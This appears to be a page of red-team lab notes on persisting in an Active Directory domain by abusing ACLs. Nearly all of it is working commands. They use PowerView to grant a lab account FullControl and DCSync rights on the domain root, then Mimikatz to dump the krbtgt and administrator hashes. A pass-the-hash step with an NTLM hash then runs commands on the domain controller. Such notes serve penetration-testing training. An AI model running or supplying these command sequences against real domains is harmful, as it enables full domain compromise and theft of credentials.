Persistence ACLs- Rights Abuse

There are even more interesting ACLs which can be abused.

For example, with DA privileges, the ACL for the domain root can be modified to provide useful rights like FullControl or the ability to run "DCSync".

#Get the Distinguished Name 
Import-module .\powerview.ps1
Get-NetOU


#Add FullControl rights: 
Import-module .\powerview.ps1
Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName student529 -Rights All -Verbose


#Add rights for DCSync:
Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName student529 -Rights DCSync -Verbose


#Execute DCSync from Powershell of student529 regular:
#This will extract hashes of the user invoked
Import-module invoke-mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\administator"'

#if we get the hash we can do the following:
#run Powershell as local admin
Import-module invoke-mimikatz
Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:dollarcorp.moneycorp.local /ntlm:a29f7623fd11550def0192de9246f46b /run:powershell.exe"'

PS C:\Windows\system32> Invoke-Command -Computer dcorp-dc -ScriptBlock{whoami}
dcorp\administrator

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\Administrator"'

How it looks from AD

PreviousPersistence ACLs - Security Descriptors NextPersistence ACL - AdminSDHolder

Last updated 5 years ago